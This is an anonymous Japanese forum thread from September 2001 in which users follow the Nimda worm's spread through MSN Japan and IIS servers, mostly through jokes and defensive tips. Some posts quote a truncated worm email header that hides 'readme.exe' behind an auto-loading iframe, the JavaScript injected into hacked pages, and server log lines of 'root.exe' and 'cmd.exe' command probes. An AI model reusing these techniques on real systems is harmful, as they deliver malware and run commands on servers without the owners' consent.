一部の登録者の皆様にメールが届かないという事態がおこりました。
現在は復旧しておりますが、メールが届かなかった皆様には
御迷惑をお掛けしましたことをお詫び申し上げます

まあ、いいさ！俺はメルマガ毎日たくさん届くし。ヽ(´ー｀)ノ

参考までに
Microsoftについて
面白く批判しているのは↓
tp://www.asahi-net.or.jp/~FV6N-TNSK/gates/

>>295
>>264だYO!

また、MSNのページおかしくなってない？

>>294
ありがとうございます。
でも初心者なのでテキストエディタで開くというのがわかりません。
どうしたらいいのでしょう？

情報
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]

とのさきさんっすね。懐かしい。

>>284
ありがとう。。。
うんっ、わかたよ。もう、悲しい歌はうたわない！！

わらおう！！みんあでわらおう！！

あひゃひゃひゃひゃひゃ〜〜〜〜
おっへ〜うおっうおっおうっ。。。。

うあ〜ん。。。

>>299
( ´Д`)y──┛~~よくあることだったり・・・（ｗ
登録して半年も経つと内容がタブったメールが何通か・・・・

ん？今msn開いたけどなんともないぞ？

>>309
すでに対策済みみたいです

>>214
ｙひひひひひひひいひひひひひいいいいいいいい・・・

>>304
( ´Д`)y──┛~~メモ帳開いて、検索したファイルをドラッグ＆ドロップすればよいと思われ

>>309
あれ、また直ってる。

すいません。ダウンロードして実行してみました。開くことができませんしてた。
結局なんだったんですか？

これはテロを越えた戦争行為です

おおおおお
ページ開けなかったから大丈夫だと思ったけど一応検索したら
readme.emlとreadme(1).emlあるじゃねえかあああああ
びっくり

>>301
なぜかMSNサーチにとんだぞ。

>>314
あーーーーー

>>214
俺もいるぜ!
　くるのは､週に一回総理大臣からの親書のみ！

>>314
ログ見れ。
得体の知れないものをそのまま開くんじゃない。
自信がないなら何もしないのが一番。

対策されたのか。
さっき繋いだけどなんともなくてちょっと残念。

おのれﾗﾃﾞｨｿめ

これって関係あるのかなぁ
http://lijun.hainan.net/luntan/disp.asp?owner=B201&ID=4

>>319
漏れと同じだな（ｗ
後は、サーバーからの連絡と、アコムからのメールだけだ・・・

すいません。
MSNでサーチは危険ですか？

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

ひ○ゆきなんてうそつきだ〜！！
やさしい友がたくさんできたじゃないか〜

さあ歌え！！歌おうよ！！

「きっさまとおれ〜と〜あ、どおきのさくら〜」
「まいにちちぇ〜くっ　してるのに、新着はな〜い〜」

それっ！！

>>321

他にもたくさんあるぞ！

( ´Д`)y──┛~~emlファイルtxtにしてうｐしといたよ。
見たきゃここ見れ

http://nigiwai.net/koucha/MVQKJ05D.txt

>>323
やばくないそれ

>>324
( ´Д`)y──┛~~催促のメールか？（ｗ

Windows2000だけど、さっきMSN見た瞬間に、
IExplorerとexplorerが応答無しになった。
結局一度ログオフして再びMSN見にいったら、その時はもう正常に戻ってた。
新種のブラクラかと思った。

>>214

また涙が・・・でも歌うわ！！

>>323は何？
今は怖くてリンク開けない・・・

ウィルススキャンしても大丈夫だから実行したんですよ（泣

MSNサーチもダメ?

>>323

中国語（？）のサイト？

>>336
MSNサーチは大丈夫みたい。

>>323
開いても多分安全
チンのサイト

>>214　もう止めようよ…
　　メールもこない､ｹｰﾀｲもならない。
　　寂しいよね…

Proxomitron 使ってると　PostScript Killed でやばいスクリプトが消されてる。

>>238
けっケータイ。。。。
悲しい現実をもうひとつ、思い出した。。

>>335
ウィルススキャンは魔法の箱じゃないから、「自分が知らないものはわからない」。
明日あたりにはパターンファイル、ワクチンができてるだろうけど。

気を付けてね。
(責める気はないんだよ)

＞＞214泣いちゃだめ〜！

>>331
それと、宣伝メールモナー
>>335
スキャンしても出てこないんじゃなかった？

新種は出てこないだろ・・・

>>342
俺、実家の母親からしか掛かってこない（;´Д｀）

>>347
親からなんて年に3回くらいだな。
自分からもほとんどしない。

>>344〜347
つかもう、ウイルスなんてどうでもいいのね　(w

>>344
なぜ、、なぜ、おいらを慰める。。？
みんな淋しいんじゃないか〜〜〜！！

もう、、だれも一人にはしないさ（ｷﾗｯ☆涙。。

このファイル、うちにはメールに添付された。
もち、開かなかったけど。

eturn-Path: <[email protected]>
Received: from WANGPL ([141.213.194.139]) by ****.****.**.jp with SMTP
id <20010918150516.GKYY27680.****.****.**.jp@WANGPL>
for <****@****.**.jp>; Wed, 19 Sep 2001 00:05:16 +0900
From: <[email protected]>
Subject: ucommon appcmu personal evaluation1columbia app from applycollege stuff backupnew colmbia
appbuddylist2computer sciences essaythird day - love songmatt redman -
13 let my words be fewcmu personal evaluationcornell appriched20checklistriched20eph4letter
to ***.****.**.jp.cmu personal evaluation
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <20010918150516.GKYY27680.****.****.**.jp@WANGPL>
Date: Wed, 19 Sep 2001 00:05:19 +0900

>>343
ヒューリスティックスキャン（だっけ？）っていうのは当てにならないの？

>>350
だって〜、知らせる友がいないだも〜んっ

あひゃひゃ〜〜っ

今回のreadme.exeは9/18にﾊｹｰﾝされた新種のワームなので、現時点では
ウィルスチェックソフトで検出出来ないZO。
怪しいEXEは絶対実行すべきではない！

>>214　ごめん！思い出させて…
　　　俺のｹｰﾀｲって、メールできないから
　　　迷惑メールすらこないんだよね…
　　

３５０→３４９
お詫びして訂正します。

test

関係者以外立入禁止。

さ、さすが速報板。
大半の人がウィルスの話をしていない、、、

私だけじゃなかったのか。

214は丁寧だね。やっぱり友達だ！

MSNは未だにダンマリだな。(-。- )ボショ

30分でＺＡ25回反応してるんですけど・・・

>>238
おいら、、あんた好きだよ。ホント好きだよ。
おいらのケータイもメールできん。
まわりで鳴るんだよね、「あっメールっ」とかいって、
楽しそうに見てるんだ。
おいらは、その脇で、タバコふかすしかねえんだよ。
灰色の小さなケータイの画面見ながら。。
もち、ストラップはふつ〜の。

>>363
俺のは30分で１0回位。

>>343
(ちょっと逃げモード)
「このファイルはウィルスの可能性がある」と言うことは分かるだろうけど、
「このファイルはウィルスの可能性が絶対ない」と断言はできないと思う。
だから得体の知れないファイルは開かない。

MSNは今頃、鯖缶が携帯で叩き起こされて
眠い目をこすりながらtelnet中と思われ。

>>363
折れも今日はやけにぞぬが反応するなぁと思ってた。
明日朝から会社のパソコン動き出したらもっと凄いことになりそう。

笹塚のビルは今日も明かりが消えないのか・・・

>>367
てことは、トレンドマイクロは赤いサイレンか？

( ´Д`)y──┛~~オレも携帯メールできないよ、ちなみに携帯鳴るの月に５回くらい（ﾎﾞｿｯ

いろんな所を回ってたら、カルーセル麻紀逮捕って・・・・いやぁ、バンバン捕まりますな。ヽ(´ー｀)ノ

>>365
ＤＬされた形跡は無いんだけど
323のリンクのチンのサイトの
これが気になる
うぃん９８！！
鞭唹・議狼由:
Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows 2000
Microsoft Internet Explorer 5.0
+ Microsoft Windows 98

音鞭唹・狼由:
Microsoft Internet Explorer 5.0.1SP2
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows 2000

今日のトップニュース 更新 09/19/2001 02:05
のんきに更新しているな。
今日のトップニュースはMSNがウィルスに感染したことだ。

このウィルスに感染しちゃったＰＣがreadme.exeの発信地になるみたいです

送信するパケットはセキュリティーホールを一通りつつくので管理の悪いサーバは落ちます

現時点でメールフィルタにひっかからないので
朝になって感染が広がるとトラフィックが上がってこれもやばいです

以上

>>366
なるほど、とにかく気をつけるに越したことはないと。

これって、HP開くとreademe.emlに飛ばされて、readme.exeが勝手に実行されちゃうんですか？？

>>371
いや本当に最近いろいろな事が起きるね・・・
毎日が祭りだｱﾋｬ

既に2chが重くなってきた気がする・・・気のせいか？

を、一応、emlファイル検索かけて全て削除しreadme.exeも削除したけど、
いま、またHDDが騒ぎ出した。FDDにもアクセスする。

>>378
思った！！重い！ﾋｼﾞｮｰに重い

すいません、ｒｅａｄ．ｍｅファイルを実行したらﾏｼﾝがﾀﾞｳｿして
煙が出てきたんですが俺の頭大丈夫デスカ？

重い

63.209.161.60
ここってマイクロソフツか？
ここにもあるんだが
どうしよう

この件とは関係ないと思うのだが、
ニュー速の鯖がちょっと重たくなってきた。

>>381
もう逝ってよし！

MSNでウィルスだもんなぁ。
そろそろセキュリティの事考えないといかんなぁ。
俺ウィルス検知ソフトすらいれてねーよ。

ログ見ようとしてＣドライブ開いたら、いつのまにか
Ｃｍ_error.txtなるものがあるんですが
これ、なんですか？

うん、本当に重くなってきた。ぞぬもあいかわらずうるさく検知してる。
明日もしかしたら本当に大騒ぎかも。

ＺＡ34回突破
(;´Д`)

ほんとだ、鯖重い。。すごい時間かかる。

悲しみも一段と重い

ＭＳＮニュースは大丈夫ですか？

５千万円恐喝　チーマー弟に実刑　名古屋地裁　懲役５年―８年判決
http://www.chunichi.co.jp/00/sya/20010918/eve_____sya_____006.shtml

ニュー速の鯖以外も重たくなってるの？

これは狂牛病です。

すいません、
ｍｓｎって何の略ですか？

>>381

(･∀･)ﾃｵｸﾚ!!

>>379
エクスプローラで「保護されたオペレーティングシステムファイルを表示しない」
のチェックをはずしてもっかいファイル検索してみ。

検索条件は「今日作成されたファイル」で。
変なexeが SuperHidden属性で作られてるから。

>>393 んなわけあるかい！

ＺＡも２時間半で１２０回突破！

>>393
ゲートウェイ

質問ですが
readme.emlは今のところ害なし？
消したいけどアクセスできなくて消せない　再起動したら活動開始　とかないよね・・・？

すぐにワクチンってできるものなんですか？
除去できますかね？

糞スレを立てまくってるから重いんじゃないかい？

＞消したいけどアクセスできなくて消せない

どういうことだ？
読み取り属性？

>>214　遅レス　ｽﾏﾑ
俺も､貴方を気に入った!
　　そうだよね！みーんなケータイでメールなんかしちゃって｡
　　俺もメール打ってる奴らの横でタバコ(KENT)ふかしてる。
　　ちなみに、車を運転しながらメール打って、ちんたらしてる奴には
　　クラクション＆パッシングのあらしです。
　　俺たち､ｹｺｰﾝｽﾙ?

>>401

明日にはできる

マカー・スーパー・ニセ

逆から読んでね。はーと

おでんユーザ居る？
POP鯖に繋がりにくくない？

>>400
使用中で消せないの？
だったら、回復コンソールで消せるんじゃないかな？

IE5.01でもSP2入れてれば大丈夫なんだよね？
とりあえず*.emlもreadme.exeもなかった。

>>407
おでんだが、なにか？
･･･じゃなくって、ＰＯＰ鯖ってなんですか？
教えてﾁｬﾝでｺﾞﾒｿ

IE5.01でもSP2入れてれば大丈夫なんだよね？
とりあえず*.emlもreadme.exeもなかった。

サイバーテロだ！　　ι（゜∀゜）ノ
サイバーテロだ！　　　　ι（゜∀゜）ノ
サイバーテロだ！　　　　　　ι（゜∀゜）ノ

>>238

>>410
メール受信に使うサーバ。
メール受信、普通に出来てる？

サイバーミニスカポリス出動！

改めて、、
>>238早漏ですまぬ。
おいらは、おとこじゃ。
モホの気もないではない。

>>414
ありがとう。
大丈夫みたい。今,１通受信できたし。
繋がりにくいってこともなかったよ。

関係者以外立入禁止！！

遅くなったゴメンね

>>403
ライトプロテクトとか　使用中に出るやつね
>>408
回復コンソールってwin2000じゃなくてもある？オレ98
てかsafemodeだったら大丈夫だよね？

MEP51B3.TMP.EXE というふぁいるが
1秒間に2回ほどアクセスしました４５回くらい

http://63.209.161.60/←マイクロソフツもあるぞ

>>214
>モホの気もないではない。
ﾜﾗ ますます気に入った!!!
　　

半日ウィルスはＨＰのサーバーに潜み、
マイクロソフト社のインターネット閲覧ソフト「ＩＥ」を通じて
被害を広げる。ウイルスの仕組まれたＨＰを見ると、有害
プログラムが動きだし、パソコンのシステムを改ざんする。
流行ってるらしい・・・。

214と238は面白い

単なるシステムエラーだろ。代わりに表示や
MSNサーチのスピードが上昇した気がする。天下のマイクロソフトのファイヤー
ウォールを潜り抜けるハッカーは、菅井きんしかいないって（笑。

４２２
半日　×
反日　○

>>417
情報さんくす。

>>422
どこの新聞記者が書いた記事？
rhymeさんに突っ込み入れて欲しい記事だな。（笑）

きちょ〜な、友を失わぬために一応言っときますが、

あの、そろそろ、冷たい布団に入らせていただきます。
それでは、また、どこかで、、、

こいつか？
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml

>>214
バイバイ　トモダチ

>>214　俺も寝ます。おやすみ…
　　　　　また何処かで会おうね
>>423　ありがとう！
>>ALL　マジでレスしてる人たちごめんなさい。

>>238
別にいいよ面白いから

>>238
さすが、気が利く、やはり友だあ。

マジレスさんたち、ごめんなさい。

感染したおいら（変化はない。もちろんメ〜ルもない）は、
あしたから、また、「新着メッセージはありません」の言葉を
唯一のメールと思いこみ生きていきます。

おやすみなさい。

やっぱりコンピューターはもう買い換えしなくてはならないのですかね（ＴＴ）

悪意ある Javaスクリプト実行による被害情報
http://www.ipa.go.jp/security/ciadr/20010820java_browser.html

いや〜折れんところのサーバにも怪しいパケットがいっぱいくるわ。
韓国のいろんなIISサーバからwww connectionの連アタがよくくるんだけど、
相手に行ったらreadme.exe発見♪

なんかＺＡも静かになったし
バックアップとって寝るかー

>>434

ずいぶん古いネタを持ち出してきたな・・・・

全部フォーマットすれば問題ないですかね？
また入れなおしか・・・・。

Code Blue ワームをコンピュータから削除するには:

Regedit を使用して、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run レジストリ キーを見つけます。
C:\svchost.exe に対するレジストリ エントリを見つけて削除します。
C:\svchost.exe というファイルを削除します。
システムに C:d.vbs というファイルが残っていれば、それを削除します。
コンピュータを再起動します。

http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

てか何でIISなんて使うんだろう。
怖いわ〜

>>438
早まるな。
明日になれば復旧方法も出てくるから。

皆さん,サーバーがどうとか
パケットがどうとか言っていますが
何のことなんでしょうか？教えてください。

　　　　　,: 三ﾆ三ミミ;､-、 　 　 ＼／ 　￣ 　 | --十　i　 　、.__/__　＼　　, 　 ____|__l l　ー十
　 　 　xX'' 　 　　`ＹＹ"ﾞミ､ 　 　∠=ｰ　￣ヽ　|　 __|.　 |　　 |　/ 　ヽ　　／　　　__|　　　,二i￣
　　　 彡" 　 　 ..______.　　ﾐ.　　　 （___　　 ノ.　|　(__iﾞ''　し 　 　　　ノ　／^ヽ_ノ （＿＿　(＿＿
　　　 ::::: 　 　 　　 　　 　 ::;
　　　,=ﾐ______=三ミ ji,=三ミi
　　　i ､'ｰｰｰ|,<(･)>|=|<(･)>| 　 　 　 　 　 　 　　 ,-v-、
　　　i; ':: 　::: ーｰ"　ﾞi ,ｰｰ'j　　 　 　 　　　　　　/ _ﾉ_ﾉ:^)
　　　 ｰi:: ::i: 　／`^ｰﾞ`､_ ..i　　　　　　　　　　　/ _ﾉ_ﾉ_ノ ／）
　　 　　|:::.　ﾞ"i _,,.-==-､;ﾞﾞi　 　 　 　 　　　　　/　ﾉ ﾉノ／／
　　 　　〉::.:..　 丶 "￣ﾞ .'.ﾉ　　　　　　　____　 /　 ______　ノ
　　　／ i, `ｰ-､.,____,___ノ＼＿＿＿＿（" 　`ｰ"　、 　　 ﾉ
　ｰ'/　　'i.　ヽ､ ,二ﾆ/ 　　＼ 　 　　　 ｀`ｰ-､　 　ﾞ　　 ノ
　 /　　　'i、 ／＼　/　 　 　 >　　　　　 　（　`ー''"ｰ'"
　 ＼ 　　'i," （__）　/　　　／　　　　　　 　 ＼ ／ノ

サーバ管理者以外にはあんま気にしなくていいんじゃない？

悪意ある Javaスクリプト実行による被害情報・・・

数日前、2ｃｈ世界になぐりこみ　とかいうスレの　1　に書いてあった
ＵＲＬにアクセスした君、ＰＣおかしくなったでしょ。

悪意には悪意をもって報復されたのです。

ざーめん。

タイミング良くヤフーから壊れたメールが送られてきたよ。
プレビューするだけでアウトルックが強制修了する。

削除したけど大丈夫かな。

>>444
そうなのかぁ！ありがとうございます。
ってことは、ココってやっぱり色んな方が
来てるんですね･･･。

>>447
readme.exeはWinユーザなら誰しもが感染するぞ。

>>448
実行しなければ,平気なんですよね？

>>442
ネタか？ネタじゃないとしたら、今後それも解らないまま
ネット生活を続けると、自分のみならず他にも知らず知らずの内に
トラブルを与えることになるぞ。

まぁ個人セキュリティがこれからの重要課題という事で。

ちなみにサーバーはインターネット上で皆にウェブサービスを
与えるコンピュータ。パケットはそれら、ないしはクライアント間で
やり取りされる情報の単位表現。

で、今回の騒動は他コンピュータに悪意有るコードを広げるために
Nimdaワームがパケットを莫大に送っている、ということで。

>>448
胴衣

９８だけどreadme.emlもって
マイクロソフト行ったら
MEP51B3.TMP.EXE落としてきたもん
結構やばいよ

codered系の進化系かねこれ？
実行はそりゃしちゃいけないよ〜。それ常識。
IISでWebサーバしてる人はcodered系の動きしそうだから
防衛しなきゃだねぇ。

>>451
俺もZAのアクセスログのIPにIEで繋ぎにいったら、
そのファイル名のダウンロードになった。

emlを、毎日検索してれば平気ですか？

今回のは鯖同士の感染よりreadme.exeの方が被害が大きいと思われ。

プロバの鯖がやられたみたい…。
俺のHPにもjavaスクリプトが追加されてたよ。。。鬱だ。
とりあえずhtmは削除してみたが、readme.emlってファイルは
消してもしばらくすると復活する。。。

>>456
どこ？
鯖名だけでも教えて。

>>453
やっぱりかなりやばいな
おれＺＡ65回反応してる

>>454
オレもシロウトみたいなもんだが・・・
eml消せば問題ないでしょ exeは当然削除

>>456
怖すぎ。
ねっとできない

>>456
マジ？ひどくないかそれ

>>459
ありがとうございます。
自分が無知すぎて恥ずかしくなります･･･。
ココの板の住人さんたちは,優しいですね。
私が住み着いてるところだったら
きっと叩かれまくると思ふ･･･。

>>455
readme.exeがどんな熱い感染・破壊活動するか楽しみだね♪

>>459
ＺＡつけといて
MEP51B3.TMP.EXE
も検索すればいいかも

２ｃｈのサーバーってだいじょうぶなのか？

MSNみたいな素人が集まる場所に感染するんだもんなぁ…。
MSNってホームページ（狭義の）に設定してる人すごい多いんじゃないの？

>>465
2ちゃんねるはLinux+Apacheだから問題ない。

ここは大丈夫
ただしかし、きっとここも不要なトラフィックが増えてるだろうけどねぇ。

>>464
ヘボイから検索してきたよ・・・
「ZONE ALARM」ね　名前は知ってるけど、全然導入考えてなかった
いれよっかな

ネット初心者、特におじさんおばさんはホームページmsnだよね
初期設定だよね？

だな

>>456
完全に感染してるね。


どれだけの期間でMSNが対処したかわからないけどMSNから大量感染だろうな。
過去最大の被害になるよ、おそらく・・・

さっきから言ってる「MEP51B3.TMP.EXE」って何ですか？
まあうちのPCにはなかったけど。readme.exeは落としてしまった・・・。

まさかと思ってFleshEYEで検索してみたら・・・(;´Д`)
ttp://search.fresheye.com/?kw=readme.eml&term=monthly

>>456 みたいなISPがもっとあるとすると被害は計り知れないな。。。

もしかしたら、readme.exeって感染した普通のマシンから
www connectionいっぱいしてIIS探して更に感染広げていくのかなぁ？
かっちぇ〜。（妄想）
本当の動作が分るの楽しみだわ〜♪

これと関係ある？
http://www.bc.wakwak.com/~milky/data/data5378.jpg

>>474
鳥肌たった…。
ひどすぎる。

>>474

＞鎌倉
＞http://www.mfi.or.jp/togawa/sintaro/Kamakura/kamakura.htm
＞に行って来ました 2月17日，パパのプリウスで，鎌倉に行って来ました。..

ﾜﾗﾀ

>>474
早稲田の鯖もやられてるな。

まだ増えるんだろうな。
でもさっきの検索はｲｲ！

>>474
これって・・・
検索データベースはロボットによる登録だよね。
ということは、氷山の一角に過ぎない。
新たなセキュリティホールでの感染だったら、IISのサーバー全滅じゃん。

>>481
確かに感染状況を知るには良いね。

明日の朝には１８件が１８００件になってたり・・・

>>484
可能性大…。

今日の夜にでもまた検索かけてみよう。
どうなってるかな？ ﾜｸﾜｸ

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
↑
こういうタグで書き換えられてる。
(マックスバリュー東北の現在改ざんされてるソースより)

>>486
検索エンジンもだめだったりして

なんどか検索しなおすたびにHit数が上がってく。
さっきは14だったのに今は18だ・・・。

>>487
5.5以上なら大丈夫らしい

3:58現在、
www.msn.co.jp
開けません。

今きたんだよ〜…なんちゅう事がおきてんだ…マジ？

このスレがこんなにしょぼい進行とは・・・
テロの影響とはかくなるものか。本来、大祭開催決定の話なんだけどなぁ。
天下のＭＳ日本法人の失態というのに。

さて、寝よう。

会社のWEBサーバー事情があってIISなんだよね。
セキュリティ関連のアップデートは常に最新のものにしてたから、ある程度安心してた。
もしかしてと思って、今pcANYWHEREで繋ぎに行ったら、readme.emlがあった・・・・・・・・
早急にWEBサーバーサービスを停止。
最悪だ・・・・・
IISサーバーにはすべて感染するよ・・・・・

あした、ワクチン、出来てるかなぁ・・・はぁ(ToT)

MSN開かないし〜

このプロバイダーやばいぞ！！！ユーザーページも感染してるな。

ttp://www.mfi.or.jp/

開くな！

http://www.ipa.go.jp/

ここに知らさなくて良いかな？

Code Blue ワームをコンピュータから削除するには:

Regedit を使用して、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run レジストリ キーを見つけます。
C:\svchost.exe に対するレジストリ エントリを見つけて削除します。
C:\svchost.exe というファイルを削除します。
システムに C:d.vbs というファイルが残っていれば、それを削除します。
コンピュータを再起動します。

http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

名城大学 都市情報学部
http://www.urban.meijo-u.ac.jp/

ここはもっと凄いことになってるよ

ちなみにここ。片田舎のこじんまりしたプロバですわ。
http://www.mfi.or.jp/www/
（まだ危険な状態）
javaについての警告文が切ないね（ｗ

ユーザーは自分のHPを登録できるんだが、登録されているHPすべてNGだと思われ。
ちなみに俺は登録してない。

>>498
状況が正確に理解・説明できる方は、
関係各位に通報すべきでしょうね。

>>499
MSNが感染したということは、Code Blueでもない、さらに新種のものでは？

ちなにみトップのソースには
しっかり「readme.eml」の文字があります

つか、気がつけばマジレスばっか

>>500
開きたくない

ログは、こんな感じ・・・。

[19/Sep/2001:03:34:02 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
[19/Sep/2001:03:34:02 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
[19/Sep/2001:03:34:02 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218

>>500
ﾜﾛﾀ
完全にkrackされとる。

>>352
ノートンでヒューリスティックスキャンを最高レヴェルにしたけど引っかからなかったYO!
ヒューリスティックスキャンて当てにならないんだね

下手すりゃ >>500 がすべての始まりじゃねぇの？

大変なことが起こっているってのは、わかるけど、
なにせ、おれ厨房だから、説明できんのよ。

誰かしようぜ。

2chのいいとこも見せなきゃ！！

>>505
JavaScriptを無効にしてれば怖くないよ

>>500
どんな感じ？
気になる、が怖くて開けない

オリコも感染中。
おいら、オリコに警告メールしてあげたぞ！

>>510
ノートンですでに発表されてるのにipaにタレコまれてないはずがない。

>>500
我們是中国人!
hacker by 刀瘋

>>514
あ、そうなんか。

どんどん、web サーバに Get をリクエストしてくるよ〜・・・。

>>510
親切に、下記のような感染済サイトにお知らせしてあげればﾖﾛｼ。
http://search.fresheye.com/?kw=readme.eml&term=monthly

>>500 の様子が知りたいけど怖くて開けない人は
まずソースを覗くべし。
view-source:http://www.urban.meijo-u.ac.jp/

>>500
まじかよ
祭りだな

fuck censorship!
検閲?

>>509

禿同。
すげーあり得る。

スカパーでFox Newsみてたら、Code Redの亜種で「ミンダ？」
とかいうウィルスが感染を広げてるって生放送でやってたけど
関係あるのかな？

>>512
とりあえずreadme.emlのある
http://www.urban.meijo-u.ac.jp/index.html
から
http://www.urban.meijo-u.ac.jp/ztoshi/top.html
に飛ばされるだけ

でもこのtop.htmlには>>515があり、小泉総理の目隠し画像
ってかんじ

>>523
それの話だよ。
Nimda。

>>518
オレ、こわいから、URLずうっと踏んでないんよ。
普通のＰＣはダイジョウビなの？

オレのは、WinMEで、IE5.50なんだけど、

>>500
笑った　これいつクラックされたの？

>>523
コードネーム Nimda です。

ここってたぶんスレッド名がそんなにインパクト無いから
読んでない人いっぱい居るんだろうな。

>>500
これは一回見ておくべきと思われる。
java off でだいじょぶだったよ

スレを一通り読んでなお、どのURLもクリックできない自分の
へたれ具合が悲しい。

http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=www.unionsys.co.jp
The site www.unionsys.co.jp is running Microsoft-IIS/4.0 on NT4/Windows 98.

さっき、ZONE ALARMの存在を知ったんですが
インストールしておいた方がいいのでしょうか？

>>529
建て直しも、許されるとおもわれる。かなり大きい話になっているから。
でもぉ、ぼくに〜は　スレ建てできなーい♪　誰か任せた。

確かにカナリヤバイ

のわりに伸びが悪いしな

Netscape 6でもDLダイアログ開くよ。ネコミだけじゃないか？大丈夫なブラウザは！

>>533
しておいた方がいい

ずいぶん前に入れたTinyしかない…

>>526
IE 5.5 / 5.01 の SP2 なら大丈夫。だが、readme.exe を手動で起動してはダメ。
SP1 以前だと、アクセスしただけで勝手に readme.exe が起動してしまう。

>>531
俺も（ﾜﾗ

小泉政権に対する、中国人のサイバーテロだね、これは・・・・

ある意味これも　http://www.arch.ce.nihon-u.ac.jp/~gogawa/up/
やばいかも

msnって確かIEのデフォホームページよな・・・
セキュリティーパッチなんて当ててないと思われる
PC初心者が大量に見たんだろうなぁ・・・

>>531
対象をファイルに保存してメモ帳で読み

>>526 >>523
ありがと。スレ全部見てなかった、スマソ。
nとm聞き違えた、鬱氏。

あのーすいませんが･･･みなんさん何を悩んでいるのでしょうか？
ぼくはＭＳＮのホットメールを使ってるんですが、そこにもアクセスしないほうがよいんでしょうか？
あほな質問すいません･･･ちなみに、最近どーもネットにつながりにくくなったり、以上に遅かったりするんで、
ＩＥ５．５にしました。

>>500
見たけど、IEフリーズしたよ。

かちゅーしゃは、すげえよ。
ハカーなんて、意味ないね。

でも、なんだかばびってきた。

>>543
俺も昨日Win98セットアップして自動で飛ばされたよ…
洒落にならん。

>>500のを保存しておいた。
http://www.geocities.co.jp/MusicStar/2856/crack/top.html

>>186のサイトで既出でした・・・鬱

( ´Д`)y──┛~~「うなぎ」見てる間ににわかにすごいことになってたな。
ちなみに>>500のソース（ハック後）

<HTML><HEAD><TITLE>China!!!!</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>P {
MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px
}
</STYLE>
<BGSOUND balance=0 src="china.mid" volume=30 loop=2>
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY text=#ff0000 bgColor=#000000>
<CENTER>
<CENTER><FONT face=arial></FONT>
<CENTER>
<P><B><IMG height=110 src="guoqi.gif" width=161></B></P>
<P><B><FONT size=7>ﾎﾒﾃﾇﾊﾇﾖﾐｹ�ﾈﾋ!</FONT></B></P>
<P><font face="arial" size="6">we are chinese!<br>
fuck censorship!</font></P>
<P><img border="0" src="xq.JPEG" width="145" height="201"><font face="arial" size="5"><br>
</font><B><FONT
align="center" ><font size="5">hacker by ｵｶｷ?</font></font></B><FONT
align="center" ><FONT face=arial><FONT
color=#ff0000><B>!</B></FONT></P>
</font>
<P>｡｡</P>
</font></CENTER></CENTER></CENTER></BODY></HTML>

マジ・・・MSNがクラックされたんだ！＞バンザーイ

怖いもの検索しちゃったよ･･･(;´Д`)
MSN、デフォルトHPだからヤバいよ・・・

職場、パソコン屋なんだけど、デモ機のトップページが
全てデフォルトのままだった・・・撃打詩嚢

>>551
＞hacker by ｵｶｷ

ﾜﾗﾀ

これっていつからなの？？

>>549
ありがと、にしてもセンスのかけらもねーな（ｗ

>>554
( ´Д`)y──┛~~hacker by 偽決!←が文字化けしたと思われ

W32.Nimda.A@mm
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

オレももちろんhtmlと画像２コ落としておいたよ

中国独特の言い回しなのか？＞hacker by

>>556
語学力もアレだな（ｗ

IEのキャッシュにいくつも残ってたよ。(;´Д｀)

>>560
うんそうみたいね　中国英語かな

祭り♥

>>558
Unicode Web Traversalのセキュリティパッチなんて出てないよ。
要は現段階では全てのIISサーバーに感染するって事じゃないの？

>>554

ほんとだ。ｵｶｷて、意味あんのかな。
オレなら、放送禁止用語とか使うのに・・・。

>>549も開くと危ない？

あのーすいません
ＭＳＮのホットメールつかってるんですが…あくせすしただけでやばいじょうきょうなんでしょうか？
よろしくおねがいします

テロ仲間ってやっぱ、中国も疑われるかもね。

>>556
↓許してやってくれ。
<META content="Microsoft FrontPage 4.0" name=GENERATOR>

ちなみに<HEAD>の中にchina.midってファイルが。。
http://www.geocities.co.jp/MusicStar/2856/crack/china.mid

ﾁｮﾄ早いがそろそろ次のスレのテンプレ決めようぜ。
あ、まずタイトルからか？

【緊急】MSNにウィルス???【緊急】
ってかんじ？
あ、このスレのタイトルよりもインパクト弱いかも。
鬱氏…。

>>568
たぶん大丈夫
でも心配なら止めとけ

これくらいやっていいんじゃない？

【緊急】新種ウィルス大規模感染中！！【緊急】

>>569
